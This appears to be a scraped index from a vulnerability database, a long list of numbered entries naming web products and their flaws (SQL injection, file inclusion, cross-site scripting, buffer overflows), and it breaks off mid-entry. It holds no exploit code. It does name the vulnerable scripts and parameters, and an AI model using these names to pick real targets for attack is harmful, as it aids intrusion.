Website click.php SQL injection [45500] Multiple WebBiscuits products header_setup.php file include [45494] ParsaWeb id and txtSearch parameters SQL injection [45469] Ultimate Webboard webboard.php SQL injection [45449] webCMS Portal Edition id_doc SQL injection [45448] webCMS Portal Edition id parameter SQL injection [45447] webCMS Portal Edition patron parameter cross-site scripting [45436] PromoteWeb MySQL go.php SQL injection [45419] IBM Tivoli Netcool Webtop privilege escalation [45416] CA Service Desk Web forms cross-site scripting [45408] web-cp sendfile.php information disclosure [45392] JETIK-WEB sayfa.php SQL injection [45390] WebPortal CMS index.php code execution [45380] Sofi WebGUI modstart.php file include [45292] UT3 WebAdmin ImageServer.uc directory traversal [45280] LooYu Web IM newVisitorChat.js and newCusChat.js cross-site scripting [45252] H-Sphere webshell4 login.php cross-site scripting [45243] Kantan WEB Server unspecified directory traversal [45242] Kantan WEB Server unspecified cross-site scripting [45241] HyperStop Web Host Directory admin/backup/db information disclosure [45224] x10 Automatic MP3 Script web_root parameter file include [45205] Beetel 220BX series DSL modems config interface information disclosure [45185] Web directory script index.php SQL injection [45151] Real Estate Website search.php SQL injection [45148] Sports Clubs Web Panel id parameter SQL injection [45123] IBM WebSphere Application Server Wsadmin information disclosure [45122] IBM WebSphere Application Server Web Container security exposure [45118] WebPortal CMS FCKEditor file upload [45113] WebPortal CMS download.php SQL injection [45062] Sports Clubs Web Panel index.php file include [45061] PhpWebGallery isadmin.inc.php cross-site scripting [45060] PhpWebGallery isadmin.inc.php and init.inc.php file include [45024] Kim Websites upload.php file upload [45009] Peachtree Accounting ActiveX control (PAWWeb11.ocx) code execution [45008] Apple iPod touch WebKit code execution [44961] D-Link DIR-100 Web proxy filter security bypass [44959] Dating Website upload_banner.php file upload [44886] Living Local Website listtest.php SQL injection [44878] aspWebAlbum album.asp cross-site scripting [44877] aspWebAlbum album.asp SQL injection [44876] aspWebAlbum image file upload [44822] WeBid eledicss.php file manipulation [44820] WeBid cron.log information disclosure [44817] WeBid item.php and admin panel SQL injection [44804] WeBid config.php file upload [44740] Mono Sys.Web module index.php CRLF header injection [44693] Webboard admindel.php SQL injection [44692] Webboard admindel.php security bypass [44673] Civic Website Manager calendar control cross-site scripting [44638] Web Directory Script listing_view.php SQL injection [44602] Fujitsu Web-Based Admin View directory traversal [44577] webEdition CMS we_objectID parameter SQL injection [44574] Anzio Web Print Object (WePO) ActiveX component buffer overflow [44557] Opera Web feed source information disclosure [44534] Interleave Mobile Device Interface information disclosure [44479] Horde Groupware Webmail multiple unspecified [44454] Meet#Web root_path parameter file include [44435] Oracle WebLogic Apache Connector buffer overflow [44413] Sun Java System Web Proxy Server FTP denial of service [44371] Ruby WEBrick::HTTPUtils.split_header_value() denial of service [44281] BEA WebLogic Server and WebLogic Express LDAP denial of service [44264] IBM WebSphere Portal unspecified authentication bypass [44250] Cisco Webex Meeting Manager WebexUCFObject ActiveX control buffer overflow [44124] Blue Coat K9 Web Protection HTTP version buffer overflow [44123] Blue Coat K9 Web Protection Referer header buffer overflow [44114] Sun N1 Service Provisioning System (SPS) Java System Web Server plugin unauthorized access [44101] PhpWebGallery adviser mode information disclosure [44100] Reviews Opinions Rating Posting Engine Web-Site PHP Script comments.php SQL injection [44064] HIOX Web Browsers Statistics multiple scripts file include [44055] Web Wiz Rich Text Editor RTE_popup_link.asp cross-site scripting [44020] phpwebnews index.php SQL injection [44012] Web Wiz Forum mode parameter cross-site scripting [44011] Web Wiz Forums log_off_user.asp cross-site request forgery [43978] Sun Java System Web Server unspecified cross-site scripting [43977] Sun Java System Web Proxy Server unspecified cross-site scripting [43976] Sun Java System Web Proxy Server View URL Database cross-site scripting [43938] EZWebAlbum constants.inc security bypass [43920] EZWebAlbum download.php file disclosure [43885] Oracle WebLogic Server Apache Connector buffer overflow [43879] LunarNight Laboratory WebProxy unspecified cross-site scripting [43859] Spring Web MVC module information disclosure [43858] Spring Web MVC module databinder weak security [43857] Citrix XenServer XenAPI HTTP interfaces cross-site scripting [43829] Oracle WebLogic Server JSP pages information disclosure [43828] Oracle WebLogic Server ForeignJMS privilege escalation [43827] Oracle WebLogic Server console and server log privilege escalation [43826] Oracle WebLogic Server Console/WLST privilege escalation [43825] Oracle WebLogic Server denial of service [43824] Oracle WebLogic Server UDDI Explorer unauthorized access [43823] Oracle WebLogic Server multiple Web plug-ins unauthorized access [43781] Galatolo WebManager all.php cross-site scripting [43776] Comdev Web Blogger arcmonth parameter SQL injection [43751] Maian Weblog index.php security bypass [43739] WebCMS index.php SQL injection [43735] Apple Xcode WebObjects information disclosure [43710] phpDatingClub website.php file include [43709] 3Com HomeConnect Cable Modem External with USB Web server denial of service [43684] phpwebnews index.php SQL injection [43683] phpwebnews bukutamu.php SQL injection [43672] Xerox CentreWare Web unspecified SQL injection [43671] Xerox CentreWare Web unspecified cross-site scripting [43668] Sun Java Web Start cache information disclosure [43667] Sun Java Web Start file manipulation [43666] Sun Java Web Start writeManifest method directory traversal [43664] Sun Java Web Start GetVMArgsOption function buffer overflow [43634] WebChamado eml parameter SQL injection [43633] Academic Web Tools rss_getfile.php open redirect [43596] webXell Editor upload_pictures.php file upload [43595] CMS WebBlizzard index.php SQL injection [43564] Wordtrans-web link_options parameter command execution [43560] WEBalbum photo_add.php security bypass [43555] Web Server Creator createdb.php file include [43535] Brightcode Weblinks component for Joomla! index.php SQL injection [43534] VanGogh Web CMS article_ID parameter SQL injection [43469] Xe webtv component for Joomla! index.php SQL injection [43425] Jokes Website joke.php SQL injection [43405] Cheats Website item.php SQL injection [43401] Tips Website tip.php SQL injection [43399] Riddles Website riddle.php SQL injection [43397] Drinks Website drink.php SQL injection [43373] Keller Web Admin index.php file include [43361] Webdevindo-CMS index.php SQL injection [43344] WebGUI Collaboration System RSS feeds information disclosure [43329] Microsoft Exchange Outlook Web Access HTML cross-site scripting [43328] Microsoft Exchange Outlook Web Access email fields cross-site scripting [43221] Apple Safari WebKit JavaScript array unspecified code execution [43201] aspWebCalendar calendar_admin.asp file upload [43194] Easy Webstore index.php SQL injection [43179] Academic Web Tools index.php session hijacking [43178] Academic Web Tools multiple cross-site scripting [43177] Academic Web Tools rating.php SQL injection [43175] Academic Web Tools download.php directory traversal [43174] nweb2fax viewrq.php command execution [43173] nweb2fax viewrq.php and comm.php directory traversal [43156] WebCalendar send_reminders.php file include [43115] Webmatic unspecified cross-site scripting [43110] AWBS (Advanced Webhost Billing System) news.php SQL injection [43105] Webmatic unspecified SQL injection [43100] NITRO Web Gallery albums.php SQL injection [43092] PHP JOBWEBSITE PRO JobSearch3.php SQL injection [43069] WebChamado lista_anexos.php SQL injection [43061] Xerox WorkCentre and WorkCentre Pro Web server cross-site scripting [43060] WebChamado index.php SQL injection [43059] Xerox WorkCentre Web services security bypass [43058] Multiple Xerox Copier/Printer products Web server cross-site scripting [43056] Kronos webTA com.threeis.webta.H710selProject and com.threeis.webta.H720editProjectInfo cross-site scripting [42991] BackWeb Lite Install Runner ActiveX control (LiteInstActivator.dll) buffer overflow [42975] Real Estate Web Site location.asp cross-site scripting [42974] Real Estate Web Site location.asp SQL injection [42934] Galatolo WebManager view.php SQL injection [42923] Galatolo WebManager index.php file include [42901] BEA WebLogic HTTP request smuggling [42898] IBM WebSphere HTTP request smuggling [42893] WEBalbum photo_add-c.php cross-site scripting [42884] F5 FirePass webyfiers.php and index.php cross-site scripting [42872] VMware VIX Application Programming Interface (API) multiple unspecified buffer overflow [42842] BitKinex WebDAV and FTP clients directory traversal [42822] IBM WebSphere Application Server SOAP security header exposure [42813] SMEweb multiple scripts cross-site scripting [42811] SMEweb catalog.php SQL injection [42743] Kent Web Mart unspecified cross-site scripting [42724] SAP Web Application Server sap/bc/gui/sap/its/webgui cross-site scripting [42718] Apple Mac OS X Image Capture Web server directory traversal [42669] EMC AlphaStor Command Line Interface buffer overflow [42624] Sun Java System Web Server advanced search cross-site scripting [42574] Weblosning result.php cross-site scripting [42573] Weblosning index2.php SQL injection [42555] Web Slider index.php SQL injection [42553] IBM Lotus Domino servlet engine/Web container cross-site scripting [42508] CMS WebManager-Pro index.php SQL injection [42496] Webboard showQAnswer.asp SQL injection [42475] Archangel Weblog index.php SQL injection [42472] StanWeb.CMS default.asp SQL injection [42468] Web Slider admin.php security bypass [42438] Symantec Altiris Deployment Solution Agent user interface privilege escalation [42433] Aruba Mobility Controller web UI cross-site scripting [42385] Web Group Communication Center (WGCC) multiple scripts SQL injection [42383] Web Group Communication Center (WGCC) profile.php cross-site scripting [42306] cPanel WHM interface cross-site request forgery [42305] cPanel WHM interface cross-site scripting [42301] Microsoft OWA (Outlook Web Access) no-store information disclosure [42287] Zarafa webaccess email header cross-site scripting [42266] Sun Java System Application Server and Web Server JSP information disclosure [42263] Sun Java System Web Server search module cross-site scripting [42220] Blog Writer module for Miniweb historymonth parameter SQL injection [42218] Bugzilla XML-RPC interface security bypass [42217] WebMod dot information disclosure [42215] WebMod parser.cpp buffer overflow [42207] Maian Weblog index.php and header.php cross-site scripting [42202] WebMod server.cpp buffer overflow [42201] WebMod server.cpp directory traversal [42184] RSA Authentication Agent IISWebAgentIF.dll security bypass [42174] RSA Authentication Agent WebID/IISWebAgentIF.dll cross-site scripting [42159] Novell GroupWise WebAccess .JPG cross-site scripting [42141] eGroupWare Web server unspecified [42124] Webhosting component for Joomla! catid parameter SQL injection [42118] WebGUI data form unspecifed [42116] IBM WebSphere Application Server Java plugin privilege escalation [42096] Web Host Directory Script host_id SQL injection [41974] Horde Groupware Webmail addevent.php cross-site scripting [41969] Akiva WebBoard profile page cross-site scripting [41963] Web Calendar Pro one_day.php SQL injection [41883] Grape Web Statistics functions.php file include [41862] Apple Safari Webkit host name cross-site scripting [41859] Apple Safari WebKit pcre_compile.cpp buffer overflow [41824] Ruby WEBrick CGI information disclosure [41819] mx_blogs module for mxBB functions_weblog.php file include [41805] Nortel Communication Server Web application information disclosure [41775] WinWebMail login denial of service [41757] WorkSite Web Web TransferCtrl Class 8,2,1,4 (iManFile.cab) denial of service [41710] SmarterMail Web Server SMWebSvr.exe denial of service [41699] WorkSite Web TransferCtrl Class ActiveX control code execution [41647] Borland CaliberRM StarTeam PGMWebHandler::parse_request() buffer overflow [41620] Secure Computing Webwasher unspecified denial of service [41617] Webform module for Drupal unspecified cross-site scripting [41586] Squid Web Proxy Cache arrayShrink() denial of service [41577] OTRS SOAP interface weak security [41567] Airspan WiMAX ProST Advanced User Interface Pages default password [41555] Neat weblog index.php SQL injection [41532] SLMail Pro WebContainer.exe buffer overflow [41531] SLMail Pro WebContainer.exe code execution [41492] Aztech ADSL2/2+ 4 interface shell command execution [41484] Cisco IOS VPND interface descriptor block (IDB) denial of service [41439] FreeWebshop.org customer.php unauthorized access [41430] Aeries Browser Interface (ABI) loginproc.asp and Login.asp cross-site scripting [41429] Aeries Browser Interface (ABI) GradebookOptions.asp and loginproc.asp SQL injection [41417] webSPELL board parameter cross-site scripting [41407] HIS WebShop his-webshop.pl directory traversal [41400] Webutil webutil.pl shell command execution [41399] DotNetNuke web.config file weak security [41334] Apple Safari WebCore document.domain property security bypass [41331] Apple Safari WebCore Web Inspector security bypass [41329] Apple Safari WebCore weak security [41321] Apple Safari WebKit JavaScript regular expressions buffer overflow [41320] Apple Safari WebKit component security bypass [41313] Apple Mac OS X CFNetwork 502 Bad Gateway error Web site spoofing [41250] VMware multiple products Virtual Machine Communication Interface (VMCI) denial of service [41244] RSA Authentication Agent for Web IISWebAgentIF.dll cross-site scripting [41213] WebChat module for eXV2 index.php SQL injection [41175] IBM WebSphere MQ runmqsc security bypass [41150] Adobe ColdFusion administrator interface brute force [41136] Sun Java Web Start unspecified privilege escalation [41135] Sun Java Web Start unspecified buffer overflow [41133] Sun Java Web Start useEncodingDecl() buffer overflow [41127] Linksys WRT54G FTP interface denial of service [41117] D-Link DSL-G604T cgi-bin/webcm cross-site scripting [41089] Neptune Web Server 404 error page cross-site scripting [41069] Sun Java Web Console information disclosure [41047] WebCT Don't wrap text message option cross-site scripting [41029] Sun Java Web Start application privilege escalation [41026] Sun Java Web Start javaws buffer overflow [41021] Xitex WebContent M1 redirect.do cross-site scripting [41010] Ruby WEBrick directory traversal [40992] WebKit regular expression code execution [40984] Mini Web Server (MiniWebsvr) HTTP GET directory traversal [40936] IBM WebSphere MQ XA client insecure permission [40930] IBM WebSphere MQ SVRCONN security bypass [40905] D-Bus send_interface security bypass [40862] Web_Links module for PHP-Nuke cid parameter SQL injection [40847] Aeries Browser Interface GradebookStuScores.asp SQL injection [40839] Porar Webboard question.asp SQL injection [40838] Rising Online Virus Scanner Web Scan ActiveX control code execution [40834] SurgeMail webmail.exe buffer overflow [40833] SurgeMail and WebMail webmail.exe format string [40814] Portail Web Php site_path file include [40782] Citrix MetaFrame Web Manager login.asp cross-site scripting [40757] Aeries Browser Interface (ABI) FC or Term SQL injection [40756] Aeries Browser Interface (ABI) new event cross-site scripting [40710] BEA WebLogic Portal Admin Tools page weak security [40709] BEA WebLogic Portal entitlement security bypass [40708] BEA WebLogic Workshop invalid action cross-site scripting [40707] BEA WebLogic Server and WebLogic Express WSDL information disclosure [40706] BEA WebLogic Portal unspecified Groupspace functions cross-site scripting [40705] BEA WebLogic Portal config.xml information disclosure [40704] BEA WebLogic Workshop unspecified cross-site scripting [40703] BEA WebLogic Portal Administrative Console information disclosure [40702] BEA WebLogic and WebLogic Express servlet unauthorized access [40701] BEA WebLogic Portal entitlement unauthorized access [40700] BEA WebLogic Server and WebLogic Express JMS messages security bypass [40699] BEA WebLogic Server JMS distributed queue security bypass [40697] BEA WebLogic Server and WebLogic Express login page session hijacking [40696] BEA WebLogic Server and WebLogic Express administration console cross-site scripting [40695] BEA WebLogic Server and WebLogic Express account lockout security bypass [40694] BEA WebLogic Server and WebLogic Express HttpClusterServlet and HttpProxyServlet privilege escalation [40692] BEA WebLogic Server and WebLogic Express proxy plugin denial of service [40656] Now SMS/MMS Gateway Web authorization buffer overflow [40651] WebGUI new users cross-site scripting [40625] webcamXP pocketpc and show_gallery_pic denial of service [40594] XPWeb Download.php directory traversal [40576] artmedic weblog artmedic_print.php cross-site scripting [40550] Website META Language wml_contrib/wmg.cgi and wml_backend/p3_eperl/eperl_sys.c symlink [40549] Website META Language wml_backend/p1_ipp/ipp.src symlink [40522] artmedic weblog artmedic_print.php file include [40521] artmedic weblog index.php file include [40509] Real Estate Web Site agentlist.asp SQL injection [40484] Cisco Unified Communications Manager interface page SQL injection [40478] Novell Web Manager webadmin-apache.conf security bypass [40458] artmedic weblog artmedic_print.php and index.php cross-site scripting [40416] Multiple IEA products Web server code execution [40353] Mozilla Firefox Web forgery warning dialog security bypass [40323] IBM WebSphere Edge Server caching proxy cross-site scripting [40317] SAP NetWeaver Web Application Server enserver.exe denial of service [40300] Webin webmin_search.cgi cross-site scripting [40292] Portail Web Php multiple scripts file include [40277] EMC Documentum Administrator and Webtop dmclTrace.jsp file overwrite [40272] Soft3304 04WebServer OpenSSL data denial of service [40271] Soft3304 04WebServer file names information disclosure [40229] VHD Web Pack index.php file include [40215] Novell GroupWise WebAccess webacc cross-site scripting [40166] Web Wiz Rich Text Editor RTE_file_browser.asp and file_browser.asp directory traversal [40164] Web Wiz Rich Text Editor RTE_popup_save_file.asp file upload [40085] webSPELL admincenter.php cross-site request forgery [40084] webSPELL index.php cross-site scripting [40083] Winmail Webmail module unspecified [40076] Getahead Direct Web Remoting (DWR) unspecified denial of service [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40031] WebCalendar search.php cross-site scripting [40030] WebCalendar pref.php cross-site scripting [40029] WebCalendar event description field cross-site scripting [39994] Easy File Sharing Web Server Startup folder file upload [39979] F5 BIG-IP Web Management ASM rep_request.php cross-site scripting [39974] Web Editor ActiveSquare ActiveX Control code execution [39952] eZ publish admin interface information disclosure [39933] IBM WebSphere Application Server SimpleFileServlet information disclosure [39906] IBM AIX WebSM insecure permissions [39868] Web Wiz Rich Text Editor RTE_file_browser.asp directory traversal [39863] Web Wiz NewsPad RTE_file_browser.asp directory traversal [39857] IBM Websphere Application Server http_plugin.log file information disclosure [39856] Web Wiz Forums RTE_file_browser.asp file_browser.asp directory traversal [39830] IBM WebSphere Business Modeler repository weak security [39818] IBM Websphere Application Server PropFilePasswordEncoder utility unspecified [39817] Uebimiau Webmail state variables authentication bypass [39814] IBM WebSphere Application Server monitor role users unspecified vulnerability [39808] IBM WebSphere Application Server serveServletsByClassnameEnabled unspecified [39796] 360 Web Manager CMS form.php SQL injection [39765] Small Axe Weblog linkbar.php file include [39734] Real Estate Web Site default.asp SQL injection [39724] MailBee Webmail Pro download_view_attachment.aspx directory traversal [39718] MiniWeb HTTP Server _mwProcessReadSocket() buffer overflow [39713] MiniWeb HTTP Server mwGetLocalFileName() directory traversal [39640] DVRHOST Web CMS OCX PdvrOcx Class ActiveX control buffer overflow [39635] Apple Safari KHTML Webkit denial of service [39595] Horde IMP Webmail Client and Horde Groupware Webmail Edition HTML filter security bypass [39577] WebPortal CMS actions.php SQL injection [39572] PHP Webquest backup_phpwebquest.php information disclosure [39560] PHP Webquest soporte_horizontal_w.php SQL injection [39556] Gateway WebLauncher CWebLaunchCtl multiple ActiveX controls command execution [39554] Gateway WebLauncher CWebLaunchCtl ActiveX control buffer overflow [39486] WebPortal CMS action.php weak security [39463] SAM Broadcaster samPHPweb songinfo.php SQL injection [39460] Uebimiau Web-Mail error.php directory traversal [39451] Horde Web-Mail go.php directory traversal [39414] WordPress XMLRPC metaWeblog.getRecentPosts function informaiton disclosure [39397] samPHPweb db.php file include [39391] phpWebSite search module cross-site scripting [39386] DivX Web Player npUpload.dll ActiveX control denial of service [39343] AGENCY4NET WEBFTP download2.php directory traversal [39336] WebPortal CMS index.php SQL injection [39315] Gallery WebCam module unspecified vulnerability [39216] Web Sihirbazi default.asp SQL injection [39213] Wallpaper Complete Website category.php and editadgroup.php SQL injection [39205] Sun Java System Web Proxy Server View Error Log cross-site scripting [39204] Macrovision ActiveX control (isusweb.dll) buffer overflow [39176] Aeries Browser Interface LostPwd.asp SQL injection [39175] IBM Lotus Domino Web Access dwa7 ActiveX control buffer overflow [39163] Opera Web browser bitmaps information disclosure [39161] Opera Web browser TLS certificate code execution [39147] Opera Web browser plugins security bypass [39143] MOG-WebShop index.php SQL injection [39142] Perforce P4Web Content-Length header denial of service [39117] Google Web Toolkit benchmark reporting system cross-site scripting [39116] iMesh IMWebControl ActiveX control buffer overflow [39091] Apple Safari WebKit security bypass [39086] Cherokee Web Server source code information disclosure [39085] Cherokee Web Server directory traversal [39076] FreeWebshop.org index.php information disclosure [39074] FreeWebshop.org multiple parameters SQL injection [39041] WebGUI create admin security bypass [39023] Websense Enterprise User-Agent security bypass [39005] BEA WebLogic Mobility Server Image Converter information disclosure [38981] RoundCube Webmail email messages cross-site scripting [38976] Mcms Easy Web Make index.php file include [38974] BarracudaDrive Web Server Group Chat feature denial of service [38973] BarracudaDrive Web Server delete directory traversal [38972] BarracudaDrive Web Server source code disclosure [38971] BarracudaDrive Web Server HTTP requests directory traversal [38957] webSPELL calendar.php cross-site scripting [38955] webSPELL usergallery.php cross-site scripting [38936] Websense Enterprise and Websense Web Security Suite logon page cross-site scripting [38934] Easy File Sharing Web Server username registration requests information disclosure [38933] Easy File Sharing Web Server .sdb information disclosure [38932] Easy File Sharing Web Server file upload directory traversal [38927] WebDoc categories.asp and subcategory.asp SQL injection [38907] SerWEB get_js.php file include [38906] SerWEB multiple scripts file include [38891] IBM Lotus Sametime WebRunMenuFrame page cross-site scripting [38863] Opera Web browser BMP file denial of service [38837] Squid Web Proxy Cache cache update replies denial of service [38772] Web-MeetMe play.php directory traversal [38754] IBM WebSphere MQ unspecified memory corruption [38737] Apple Mac OS X WebCore component page transition race condition information disclosure [38628] Proverbs Web Calendar caladmin.php SQL injection [38612] WorkingOnWeb events.php SQL injection [38600] FileMaker Pro and Server Web publishing cross-site scripting [38585] IBM Lotus Domino Web Server task cross-site scripting [38565] Multiple vendor Web browser SSL subjectAltName:dNSName attribute weak security [38554] Webdev HotScripts Clone software-description.php SQL injection [38504] AIDA Web information disclosure [38488] IBM Websphere Application Server Expect: header cross-site scripting [38487] Apple Mac OS X WebKit component PDF file information disclosure [38486] Apple Mac OS X WebKit component Safari TCP port security bypass [38485] Apple Mac OS X WebKit component private key security bypass [38483] Apple Mac OS X WebCore component browser history code execution [38482] Apple Mac OS X WebCore component HTML form field manipulation [38481] Apple Mac OS X WebCore component file:// URL unauthorized file access [38445] WebEx GPCContainer ActiveX Control denial of service [38444] VTLS Web Gateway vtls.web.gateway.cgi cross-site scripting [38430] Microsoft Office Web Component OWC11.DataSourceControl ActiveX denial of service [38395] CA SiteMinder Web Agent smpwservices.fcc cross-site scripting [38340] Rails URL-based Web session hijacking [38295] MyWebFTP pass.php file information disclosure [38221] SonicWALL WebCacheCleaner ActiveX control file delete [38210] Macrovision ActiveX control (isusweb.dll) code execution [38181] Webroot Desktop Firewall security bypass [38179] IBM WebSphere Application Server navigateTree.do page cross-site request forgery [38177] IBM WebSphere Application Server navigateTree.do page cross-site scripting [38159] GOM Player GomWebCtrl.GomManager.1 ActiveX control buffer overflow [38128] WebLibs weblibs.pl TextFile parameter shell command execution [38114] 3Com OfficeConnect 3CRWER100-75 Web server information disclosure [38111] 3Com OfficeConnect 3CRWER100-75 router virtual server unauthorized Web management access [37390] Aleris Software Systems Web Publisher Calendar page.asp SQL injection [37381] The Online Web Library Site scripture.php file include [37380] LiteSpeed Web Server mime-type information disclosure [37367] WebIf cmd parameter cross-site scripting [37329] Oracle Database, Application Server, and Enterprise Manager Help for Web unspecified [37327] Oracle E-Business Suite Self-Service Web Applications component unspecified [37295] Alcatel Omnivista 4760 Webclient.php cross-site scripting [37286] Mozilla Firefox and SeaMonkey XUL Web page spoofing [37278] Weblinks module for Drupal unspecified cross-site scripting [37248] Multiple Cisco Unified Contact Center and Intelligent Contact Management products Web View unauthorized access [37243] Apache Tomcat WebDAV directory traversal [37220] WebMod auth.w cross-site scripting [37203] IBM WebSphere Application Server Administrative Scripting Tools unspecified vulnerability [37147] RHSA update for Mozilla Firefox and SeaMonkey user interface spoofing not installed [37146] RHSA update for Multiple Web browser default charset cross-site scripting not installed [37060] WebDesktop apps.php and wsk.php file include [37040] Sun Java Runtime Environment Web proxy security bypass [37031] DNews dnewsweb.exe cross-site scripting [37030] xKiosk WEB xkurl.php file include [37025] TYPOlight webCMS preview.php information disclosure [36979] MailBee WebMail Pro login.php and default.php cross-site scripting [36960] Solidweb Novus buscar.asp cross-site scripting [36954] Cart32 c32web.exe information disclosure [36950] Sun Java Web Start drag and drop weak security [36948] Web Template Management System index.php SQL injection [36946] Sun Java Web Start cache information disclosure [36945] Sun Java Web Start multiple unspecified untrusted application file access [36944] Sun Java Web Start unspecified information disclosure [36935] Alt-N WebAdmin useredit_account.wdm unauthorized access [36865] WebStore WSSecurity.pl script authentication bypass [36808] Webmedia Explorer multiple file include [36798] WebBatch dumpinputdata information disclosure [36794] Sun Solaris Human Interface Device (HID) denial of service [36790] Xunlei Web Thunder ActiveX control buffer overflow [36759] Webmin unspecified URL command execution [36716] Barracuda Spam Firewall Web Administration Console cross-site scripting [36706] PhpWebGallery picture.php cross-site scripting [36704] WebBatch client cross-site scripting [36696] Level One WBR3404TX Broadband Router Web Management cross-site scripting [36644] TinyWebGallery multiple scripts cross-site scripting [36605] PHP Webquest soporte_derecha_w.php SQL injection [36570] web-app.org WebAPP filename file upload [36569] web-app.org WebAPP QUERY_STRING multiple cross-site scripting [36525] IBM WebSphere Application Server Edge Component unspecified [36493] Webace Linkscript start.php SQL injection [36466] Novell GroupWise WebAccess User.Id cross-site scripting [36427] WebOddity directory traversal [36409] Weblogicnet files_dir parameter file include [36365] Stampit Web SOAP request denial of service [36322] BEA Weblogic Server default cipher information disclosure [36321] BEA Weblogic Server and WebLogic Express headers denial of service [36320] BEA Weblogic Server null cipher information disclosure [36319] BEA Weblogic Server and WebLogic Express unspecified denial of service [36300] InterWorx-CP Webmaster Level (SiteWorx) multiple scripts file include [36264] escafeWeb (Tuigwaa) unspecified cross-site scripting [36213] Open WebMail openwebmail-read.pl cross-site scripting [36182] AWBS (Advanced Webhost Billing System) unspecified information disclosure [36180] Ripe Website Manager multiple scripts SQL injection [36179] Ripe Website Manager multiple script cross-site scripting [36167] WebEvent webevent.cgi cross-site scripting [36115] Yahoo! Messenger webcam streams buffer overflow [36029] Cisco VPN Client for Windows Dial-up Networking Interface privilege escalation [35990] Prozilla Webring category.php SQL injection [35946] WebCart unspecified cross-site scripting [35941] ZyXEL ZyWALL and ZyNOS management interface denial of service [35940] web-app.org WebAPP and web-app.net WebAPP Network Edition moveim function unspecified [35939] web-app.org WebAPP and web-app.net WebAPP Network Edition From field unspecified [35938] web-app.org WebAPP and web-app.net WebAPP Network Edition getcgi function unspecified [35937] web-app.org WebAPP and web-app.net WebAPP Network Edition memberlist.dat unspecified [35936] web-app.org WebAPP Random Cookie Password unspecified [35935] web-app.org WebAPP and web-app.net WebAPP Network Edition editprofile3 function unspecified [35931] web-app.org WebAPP displaypost function weak security [35930] web-app.org WebAPP multiple cross-site scripting [35929] web-app.org WebAPP and web-app.net WebAPP Network Edition administration cross-site request forgery [35925] Web News multiple scripts file include [35914] ZyXEL ZyWALL and ZyNOS management interface default passwords [35913] ZyXEL ZyWALL and ZyNOS management interface cross-site request forgery [35894] Webmatic multiple unspecified [35871] Cisco Unified MeetingPlace Web Conferencing STPL and FTPL cross-site scripting [35783] Sun Java System Web Server redirect feature HTTP response splitting [35754] Open WebMail multiple scripts cross-site scripting [35747] WebDirector index.php cross-site scripting [35740] Apple Mac OS X WebCore information disclosure [35736] WikiWebWeaver index.php file upload [35728] Apple Mac OS X Java interface code execution [35697] ADempiere Bazaar WebUI unauthorized access [35690] phpWebFileManager index.php file include [35671] WebEvents: Online Event Registration Template sign_in.aspx SQL injection [35669] WebStore - Online Store Application Template sign_in.aspx SQL injection [35667] Real Estate listing website application template logging SQL injection [35603] Webyapar multiple scripts SQL injection [35595] Webbler Mail a Friend mail relay [35593] Webbler comment information disclosure [35581] Webbler uploader/index.php cross-site scripting [35570] IBM WebSphere Application Server unspecified [35546] Areca Command Line Interface (CLI) cli32 file buffer overflow [35544] webSPELL index.php file include [35441] MailMarshal SMTP Spam Quarantine HTTP interface password reset information disclosure [35433] WebCit multiple cross-site scripting [35432] WebCit unspecified cross-site request forgery [35400] activeWeb contentserver CMS editor insecure permissions [35399] activeWeb contentserver CMS worklist_edit.asp cross-site scripting [35392] activeWeb contentserver mimetype cross-site scripting [35390] activeWeb contentserver CMS picture_real_edit.asp SQL injection [35389] activeWeb contentserver CMS msg parameter cross-site scripting [35335] Sun Java System Application Server and Sun Java System Web Server XSLT stylesheets code execution [35331] Webmin admin information disclosure [35320] Sun Java Web Start JNLP buffer overflow [35303] Xeweb XEForum cookie security bypass [35296] Webmatic admin_album.php and admin_downloads.php SQL injection [35278] SAP Web Application Server ICMAN.exe denial of service [35266] Oracle Rapid Install Web Server login page cross-site scripting [35236] Campsite Admin Interface unspecified [35213] Microsoft Office Web Components DataSourceControl object code execution [35212] Microsoft Office Web Components Spreadsheet object code execution [35200] Ripe Website Manager phpinfo.php information disclosure [35188] Ripe Website Manager level parameter file include [35170] SAP Netweaver Web Dynpro Java (BC-WD-JAV) cross-site scripting [35169] Sun Java Web Start java.policy file code execution [35161] WebChat login.php SQL injection [35150] Baby Web Server unspecified file upload [35140] Xunlei Web Thunder ThunderServer.WebThunder.1 ActiveX control file download [35125] Linksys WAG54GS Wireless-G ADSL Gateway with SpeedBooster router HTTP interface cross-site request forgery [35091] EVA-Web index.php3 file include [35044] LiteWeb GET request denial of service [35042] KF Web Server index.wkf cross-site scripting [35033] IBM Websphere Application Server Web container information disclosure [35003] eSellerate SDK ActiveX control GetWebStoreURL buffer overflow [34973] SerWEB _SERWEB[serwebdir] parameter file include [34921] WebIf outconfig file include [34915] Web Wiz rich text editor cross-site scripting [34905] IBM Websphere Application Server Samples component cross-site scripting [34904] IBM Websphere Application Server PD tools component unspecified [34903] IBM Websphere Application Server Default Messaging Component denial of service [34901] IBM Websphere Application Server Default Messaging Component security bypass [34869] Apache Tomcat JSP example Web application cross-site scripting [34854] Mbedthis AppWeb HTTP TRACE cross-site scripting [34845] web-app.org WebAPP and web-app.net WebAPP Network Edition menu manager command execution [34842] AppWeb MprLogToFile::logEvent function denial of service [34817] Buttercup web file manager (BWFM) index.php cross-site scripting [34810] Webmin pam_login.cgi cross-site scripting [34774] MiniWeb HTTP Server Content-Length denial of service [34766] W1L3D4 WEBmarket urunbak.asp SQL injection [34759] Yahoo! Messenger Webcam Viewer ActiveX control buffer overflow [34758] Yahoo! Messenger Webcam Upload ActiveX control buffer overflow [34726] WebSVN filedetails.php cross-site scripting [34721] Macrovision FLEXnet boisweb.dll ActiveX control buffer overflow [34720] Microsoft FrontPage Personal Web Server CERN Image Map Dispatcher buffer overflow [34707] BDigital WebStudio CMS pageid parameter cross-site scripting [34683] Comdev Web Blogger sampleblogger.php file include [34667] Madirish Webmail basedir file include [34631] IBM AIX sysmgt.websm.rte denial of service [34589] British Telecommunications Business and Consumer webhelper ActiveX control buffer overflow [34559] Zindizayn Okul Web Sistemi mezungiris.asp SQL injection [34558] WabCMS webcmsn.mdb database information disclosure [34524] Sun Java System Web Proxy Server SOCKS module buffer overflow [34519] WebAvis class.php file include [34518] Techno Dreams Web Directory / Search Engine database information disclosure [34510] GForge cvsweb.php command execution [34492] Web Icerik Yonetim Sistemi index.php cross-site scripting [34392] GNATS gnatsweb.pl cross-site scripting [34365] BEA Weblogic Server and WebLogic Express unspecified cross-site scripting [34326] OpenEdge WebSpeed Workshop multiple scripts denial of service [34321] WebGUI 